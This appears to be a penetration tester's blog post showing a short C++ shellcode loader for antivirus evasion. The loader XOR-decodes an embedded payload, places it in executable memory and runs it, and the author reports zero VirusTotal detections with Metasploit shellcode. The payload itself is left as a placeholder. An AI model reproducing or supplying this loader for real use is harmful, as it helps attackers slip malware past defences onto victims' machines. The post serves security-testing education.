I had originally set out to write a long winded blog post on different antivirus bypass techniques. I went through what was supposed to be step 1 of my guide and uploaded my resultant binary to virustotal. To my complete and utter shock, the binary got a 0/56 detection rate. I decided to throw out my long winded idea and move forward with this quick, dirty, and unbelievably easy method.
Before I dive in to this small tidbit of C++ code, I’d like to touch on a tool that is really good at producing binaries that almost always evade detection, Veil-Evasion (part of theVeil-Framework). This tool is awesome (many thanks to @harmj0y and others for creating and contributing to this awesome project) and in almost all instances I have had to use it has not let me down. If it has, I blame people who keep generating binaries and then testing them on virustotal. If you people could stop doing that, that would be great.
At any rate, this begs the question, if tools like Veil Evasion are so epic, why should you care about knowing how to slap togother a binary with a shellcode payload yourself? Well there are a number of reasons:
- People get busy and tools become deprecated
- The binaries generated by tools become fingerprintable; not the payload necessarily, but the compiled structure of the binary.
- As a penetration tester, you should really know how to do this. Ups your leet cred.. or so I hear.
#include <windows.h>
#include <iostream>
int main(int argc, char **argv) {
char b[] = {/* your XORd with key of 'x' shellcode goes here i.e. 0x4C,0x4F, 0x4C */};
char c[sizeof b];
for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';}
void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, c, sizeof c);
((void(*)())exec)();
}
So you are probably looking at that and thinking ‘really?’ – I know how you feel. This is how I felt after I intended this to be step 1 of my tutorial and I ran it through virustotal and it returned 0/56 detection. I’d like to stress that this is an incredible simple and most basic technique, yet its success is still rather astonishing.
I originally wrote this example and tested it on virus total a while ago, but I did reanalyze the executable on virustotal at the time of publishing this post and found it still had a 0 detection rate.
The binary you generate will very likely not match the SHA256 of the binary I have tested; the binary I uploaded contained shellcode generated with the metasploit framework.
Final Comments
Final note: The above may not work on _all_ antivirus solutions. I figure that was obvious, but thought I would mention it before the pitch forks come after me!
vulnerablelife 
Leave a comment